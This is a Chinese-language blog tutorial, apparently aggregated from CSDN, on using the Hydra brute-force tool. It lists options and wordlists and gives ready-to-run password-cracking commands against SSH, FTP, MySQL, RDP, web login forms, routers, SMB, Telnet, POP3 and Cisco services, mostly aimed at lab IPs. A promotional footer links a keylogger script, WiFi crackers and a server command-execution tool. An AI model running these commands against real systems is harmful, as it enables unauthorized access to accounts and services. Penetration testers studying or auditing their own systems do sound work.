Hydra(九头蛇)工具使用
Posted 剁椒鱼头没剁椒
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Hydra(九头蛇)工具使用相关的知识,希望对你有一定的参考价值。
Hydra工具使用
1.Hydra简介
1.1.Hydra介绍
hydra(九头蛇)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。
1.2.Hydra支持协议
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, mysql, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP。
1.3.Hydra下载
至于Hydra下载在kail中是自带了,这里就不进行安装了,感兴趣的可以去项目地址看看。
项目地址:Hydra
2.Hydra使用
2.1.Hydra基本使用方式
使用语法:hydra 参数 IP地址 服务名
帮助命令:hydra -h
常用命令:hydra [-l 用户名|–L 用户名文件路径] [-p 密码|–P 密码文件路径] [-t 线程数] [–vV 显示详细信息] [–o 输出文件路径] [–f 找到密码就停止] [–e ns 空密码和指定密码试探] [ip|-M ip列表文件路径]
2.2.Hydra常用参数
参数 | 介绍 |
---|---|
-h | 查看帮助菜单。 |
-R | 继续从上一次进度接着破解。 |
-S | 采用SSL链接。 |
-s | PORT 可通过这个参数指定非默认端口。 |
-l | LOGIN 指定破解的用户,对特定用户破解。 |
-L | FILE 指定用户名字典。 |
-p | PASS 小写,指定密码破解,少用,一般是采用密码字典。 |
-P | FILE 大写,指定密码字典。 |
-e | ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。 |
-C | FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。 |
-M | FILE 指定目标列表文件一行一条。 |
-o | FILE 指定结果输出文件。 |
-f | 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。 |
-t | TASKS 同时运行的线程数,默认为16。 |
-w | TIME 设置最大超时的时间,单位秒,默认是30s。 |
-v/-V | 显示详细过程。 |
-x -h | 密码生成器帮助 |
2.3.Hydra注意事项
1.server:指定目标IP。
2.service:指定服务名,支持的服务跟协议有:telnet,ftp,pop3等等。
3.自己创建字典,然后放在当前的目录下或者指定目录。
4.参数可以统一放在最后,格式比如hydra ip 服务 参数。
5.如果能确定用户名一项时候,比如web登录破解,直接用 -l就可以,然后剩余时间破解密码。
6.缺点就是如果目标网站登录时候需要验证码就无法破解。
2.4.Kail字典
在kail中是自带字典的,可以通过/usr/share/wordlists/dirb路径进行查看,当然都是txt文件,也可以自己向里面添加。
文件名 | 介绍 |
---|---|
big.txt | 大的字典 |
small.txt | 小的字典 |
catala.txt | 项目配置字典 |
common.txt | 公共字典 |
euskera.txt | 数据目录字典 |
extensions_common.txt | 常用文件扩展名字典 |
indexes.txt | 首页字典 |
mutations_common.txt | 备份扩展名 |
spanish.txt | 方法名或库目录 |
others | 扩展目录,默认用户名、默认密码等 |
stress | 压力测试 |
vulns | 漏洞测试 |
2.5.Hydra密码生成器
参数 | 介绍 |
---|---|
-x MIN:MAX:CHARSET 密码暴力破解生成器 | 规则:MIN表示生成密码的最短长度;MAX表示生成密码的最长长度;CHARSET表示使用指定的字符生成密码,'a’表示所有的小写字母,'A’表示所有的大写字母,'1’表示所有的数字,对于其他字符,只需要添加在后面即可 |
-y | 使用方式见-x,它表示charset的字符是实际的字符,而不是正则表达式 |
-x 3:5:a | 生成的密码字典长度为3到5位,由所有的小写字母组成 |
-x 5:8:A1 | 生成的密码字典长度为5到8位,有所有的大写字母和数字组成 |
-x 5:5/%,.- | 生成的密码字典长度为5位,只由’/ % , . -'这5种字符构成 |
-x 3:5:aA1 -y | 生成的密码字典长度为3到5位,且只由’a A 1’这三种字符组成 |
-x 3:5:aA1.-+# | 生成的密码字典长度为3到8位,由大小写字母+数字+.-+#进行组合。 |
3.Hydra案例
3.1.创建账号密码文件
这里由于自己搭建的靶场密码都挺复杂的,通常爆破的可能不大,这里就手创建几个账号和密码进行测试。
3.2.SSH协议爆破
3.2.1.靶机信息
Kail攻击机:192.168.10.20
centos7靶机:192.168.10.30
3.2.2.开始爆破
3.2.2.1.不知账号
这里我是用我指定的账号密码文件进行破解,如果像我一样自己创建账号密码进行破解,那么你在那个目录下创建的就需要在那个目录下操作,否则就需要加上绝对路径,并且我这里设置的线程很少,如果你感觉慢,那么可以使用多一点的线程来跑字典。
命令:hydra -L user.txt -P passwd.txt -t 2 -vV -e ns 192.168.10.30 ssh
3.2.2.2.知道账号
若知道账号了,比如root,那么可以直接指定账号配合密码字典来测试,会更快。
命令:hydra -l root -P passwd.txt -t 2 -vV -e ns 192.168.10.30 ssh
3.3.FTP协议爆破
由于FTP协议爆破和SSH协议爆破基本一致,这里就演示具体的爆破手法了,直接放命令吧。
不知账号命令:hydra -L user.txt -P passwd.txt -t 2 -vV -e ns 192.168.10.30 ftp
知道账号命令:hydra -l root -P passwd.txt -t 2 -vV -e ns 192.168.10.30 ftp
3.4.数据库爆破
3.4.1.靶机信息
Kail攻击机:192.168.10.20
windows10靶机:192.168.10.150
3.4.2.开始爆破
这里我也不分知不知道账号了,这里假设我们知道账号是root。
命令:hydra -l root -P passwd.txt -t 6 -vV -e ns 192.168.10.150 mysql
3.5.远程桌面爆破
3.5.1.靶机信息
Kail攻击机:192.168.10.20
windows10靶机:192.168.10.150
3.5.2.开始爆破
远程桌面爆破这里可以设定用户名也可以不设定用户名,我在爆破测试的时候,发现当爆破出账号密码后,会继续爆破,但是会出报错,暂时不知道情况,不知道是不是为了爆破出更多的账号密码。
这里我也不区分有没有账号了。
命令:hydra -L user.txt -P passwd.txt -t 6 -vV -e ns 192.168.10.150 rdp
3.6.HTTP协议爆破
3.6.1.靶机信息
Kail攻击机:192.168.10.20
windows10靶机:192.168.10.150
页面地址:/pikachu/vul/burteforce/bf_form.php
3.6.2.开始爆破
在HTTP协议中存在POST与GET方式进行提交。
3.6.2.1.POST方式爆破
命令:hydra -l admin -P passwd.txt -t 6 -vV -e ns 192.168.10.150 http-post-form "/pikachu/vul/burteforce/bf_form.php:username=^USER^&password=^PASS^&submit=login:username or password is nois not exists~"
解释:后面的http-post-form是定义在http中使用post进行提交,后面的/pikachu/vul/burteforce/bf_form.php是访问的URL,而且后面的username与password是根据抓包获取到的格式,至于里面的USER和PASS是固定格式,再后面的login是报错信息。
3.6.2.2.GET方式爆破
这里其实格式和post差不多,都可以一样使用,只需要修改提交类型即可。
命令:hydra -L user.txt -P passwd.txt -t 6 -vV -e ns 192.168.10.50 http-get /phpMyAdmin/
解释:后面的http-get是定义在http中使用什么提交方式进行爆破,而后面的//phpMyAdmin/指的是URL的访问连接,例如:你的登录页面是admin/index.php,那么后面就要更改为/admin/index.php
3.7.其它爆破
由于我这边没有实际的案例,无法进行测试。
3.7.1.HTTPS爆破
下面这个命令,是我在搜索中发现基本上是一致的,然而我式了一下,Hydra直接报错,提示无https协议。正确暂时我还没有测试出来,后面我再找找相关的命令,测试出来,我再添加上去。
命令:hydra -m /index.php -l 用户名 -P 密码字典.txt IP地址 https
3.7.2.路由器爆破
路由器爆破,通常默认管理密码都是一串10位左右的各种大小写加特殊字符组成。而这里对路由器爆破就用枚举生成进行爆破。
命令:hydra -l admin -x 6:10:1aA.~!@#$%^&()-= -t 6 -vV -e ns 192.168.10.50 http-get /
解释:-x是后面的是代表自动生成6到10位由大小写数字+特殊字符组成的密码。
3.7.3.SMB爆破
命令:hydra -L user.txt P passwd.txt -t 6 -vV -e ns 192.168.10.50 smb
3.7.4.TELNET爆破
命令:hydra -L user.txt P passwd.txt -t 6 -vV -e ns 192.168.10.50 telnet
3.8其它
这里的协议不是很全,若需要其它的可自行百度搜索。
总结暴力破解方法大全
九头蛇hydra
大家都看过美国队长吧
对大反派hydra组织还有印象吗?
今天介绍的这款APP,也叫这个名字。
hydra是强力thc的一款开源的暴力破解工具
功能非常强大
kali下是默认安装的,几乎支持所有协议的在线破解。
能否暴力破解,最重要在于字典是否强大
还有电脑的性能足够能跑
我们就介绍下,这个装备怎么用
使用方法
语法:Hydra 参数 IP 服务
参数:
-l login 小写; 指定用户 进行 破解
-L file 大写,指定用户的username字典
-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。
-P file 大写,用于指定密码字典。
-e ns 额外的选项,n:空密码试探,s:使用指定username和密码试探
-M file 指定目标ip列表文件,批量破解。
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解。
-t tasks 同时运行的线程数l默认是16
-w time 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以conitnue任务。)
-x 自定义密码。
service:指定服务名,支持的服务跟协议有:telnet,ftp,pop3等等。
注意点:1.自己创建字典,然后放在当前的目录下或者指定目录。
2.参数可以统一放在最后,格式比如hydra ip 服务 参数。
3.如果能确定用户名一项时候,比如web登录破解,直接用 -l就可以,然后剩余时间破解密码。
4.缺点,如果目标网站登录时候需要验证码就无法破解。
5.man hydra最万能。
6.或者hydra -U http-form等查看具体帮助。
案例分析
暴破ssh登录密码
环境介绍
攻击 :kali
hydra工具
靶机:192.168.154.131
ssh服务,正常运行
为了测试方便,我们创建两个简单的字典文件,如下:
开始爆破
root@kali:/opt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh
破解成功
测试登录
使用得到的username/密码 登录,登录成功
各种协议破解汇总
FTP协议破解
破解ftp:
hydra -L username字典 -P 密码字典 -t 6 -e ns IP地址 -v
http协议破解
get方式提交,破解web登录:
hydra -L username -P 密码字典 -t 线程 -v -e ns IP地址 http-get /admin/
hydra -L username -P 密码字典 -t 线程 -v -e ns -f IP地址 http-get /admin/index.php
post方式提交,破解web登录:
hydra -f -l username -P 密码字典 -V -s 9900 IP地址 http-post-form "/admin/index.php?action=login:user=USER&pw=PASS:"
#/index.php …这个是登录的 url
#后门是POST的数据 其中的username 密码使用 USER PASS 来代替
#然后是如果登录出错 会出现的字符 。。。然后开始破解
https协议破解
破解https
hydra -m /index.php -l username -P 密码字典.txt IP地址 https
路由器破解
hydra -l admin -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get /
-l admin 为尝试破解的用户名。
# -x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符’.'等等组成,长度为 6 - 10 位。-t 8 表示分 8 个并行任务进行爆破尝试。192.168.1.1 为 Router 地址。http-get 为破解方式(协议)
http-proxy协议破解
破解http-proxy:
hydra -l username -P 字典.txt http-proxy://IP地址
smb破解
破解smb:
hydra -l username字典 -P 密码字典 IP地址 smb
Windows远程桌面
破解rdp(windows远程登录):
hydra ip地址 rdp -l administrator -P 密码字典.txt -V
邮箱pop3
破解邮箱pop3:
hydra -l username -P 密码字典.txt my.pop3.mail pop3
telnet破解
hydra ip地址 telnet -l username字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V
语音通讯工具teamspeak
hydra -l 用户名字典 -P 密码字典.txt -s 端口号 -vV ip teamspeak
cisco
hydra -P 密码字典 IP地址 cisco
hydra -m cloud -P 密码字典 IP地址 cisco-enable
推荐阅读
【资源推荐】
-
渗透测试专用系统
- kali-linux-e17-2019.1a-amd64.iso镜像
- kali-linux-e17-2019.1a-amd64.iso系统镜像_kalilinux2019镜像-Linux文档类资源-CSDN下载
- kali-linux-2018.4-amd64
- kali-linux-2018.4-amd64操作系统-Linux文档类资源-CSDN下载
- manjaro-xfce-17.1.7-stable-x86_64.iso镜像
- manjaro-xfce-17.1.7-stable-x86_64.iso系统镜像_manjaro镜像下载,manjaro系统下载-Linux文档类资源-CSDN下载
- WiFi专用渗透系统 nst-32-11992.x86_64.iso
- nst-32-11992.x86_64.iso操作系统镜像.zip-Linux文档类资源-CSDN下载
- Parrot-security-4.1_amd64.iso 镜像
- Parrot-security-4.1_amd64.iso操作系统镜像_parrotos下载-Linux文档类资源-CSDN下载
- manjaro-xfce-17.1.7-stable-x86_64 操作系统
- manjaro-xfce-17.1.7-stable-x86_64操作系统_Manjaro20xfce-Linux文档类资源-CSDN下载
- cyborg-hawk-linux-v-1.1 系统
- cyborg-hawk-linux-v-1.1操作系统_cyborghwak安装教程-Linux文档类资源-CSDN下载
-
渗透测试相关工具
- 渗透测试实战专栏
- 【kali常用工具】上网行为工具
- 上网行为工具-网络安全文档类资源-CSDN下载
- 【kali常用工具】抓包工具Charles Windows64位 免费版
- 抓包工具CharlesWindows64位免费版-网络监控文档类资源-CSDN下载
- 【kali常用工具】brutecrack工具[WIFIPR中文版] wpa/wpa2字典
- brutecrack工具[WIFIPR中文版]及wpa/wpa2字典_wifipr-其它文档类资源-CSDN下载
- 【kali常用工具】EWSA 5.1.282-破包工具
- 【kali常用工具】EWSA5.1.282-破包工具_kali跑包工具-管理软件文档类资源-CSDN下载
- 【kali常用工具】无线信号搜索工具_kali更新
- 【kali常用工具】无线信号搜索工具_kali更新_kali更新-互联网文档类资源-CSDN下载
- 【kali常用工具】inssider信号测试软件_kali常用工具
- 【kali常用工具】inssider信号测试软件_kali常用工具_kali常用软件安装-网管软件文档类资源-CSDN下载
- 【kali常用工具】MAC地址修改工具 保护终端不暴露
- 【kali常用工具】MAC地址修改工具保护终端不暴露_python亮晶晶-Linux文档类资源-CSDN下载
- 【kali常用工具】脚本管理工具 php和jsp页面 接收命令参数 在服务器端执行
- 脚本管理工具php和jsp页面接收命令参数在服务器端执行-网络安全文档类资源-CSDN下载
】
- Java实现照片GPS定位【完整脚本】
- ReadPicExif.zip_keepalive_timeout-Java文档类资源-CSDN下载
- Python实现照片GPS定位【完整脚本】
- python定位照片精确位置完整代码脚本_照片定位-Python文档类资源-CSDN下载
- 女神忘记相册密码 python20行代码打开【完整脚本】
- 女神忘记相册密码python20行代码打开.py-Python文档类资源-CSDN下载
- python修改证件照底色、大小、背景、抠图【完整源码】
- python修改证件照底色、大小、背景、抠图【完整源码】-Python文档类资源-CSDN下载
python实战
- 【python实战】前女友婚礼,python破解婚礼现场的WIFI,把名称改成了
- 【python实战】前女友发来加密的 “520快乐.pdf“,我用python破解开之后,却发现
- 【python实战】昨晚,我用python帮隔壁小姐姐P证件照 自拍,然后发现...
- 【python实战】女友半夜加班发自拍 python男友用30行代码发现惊天秘密
- 【python实战】python你TM太皮了——区区30行代码就能记录键盘的一举一动
- 【python实战】女神相册密码忘记了,我只用Python写了20行代码~~~
【pygame开发实战开发 完整源码下载】
【pygame游戏开发专栏,获取完整源码+教程】
- 一起来学pygame吧 游戏开发30例(二)——塔防游戏
- 一起来学pygame吧 游戏开发30例(四)——俄罗斯方块小游戏
- 渗透测试实战专栏
- Windows AD/Exchange管理专栏
- Linux高性能服务器搭建
- PowerShell自动化专栏
CSDN官方学习推荐 ↓ ↓ ↓
- CSDN出的Python全栈知识图谱,太强了,推荐给大家!
以上是关于Hydra(九头蛇)工具使用的主要内容,如果未能解决你的问题,请参考以下文章
渗透测试密码暴力破解工具——九头蛇(hydra)使用详解及实战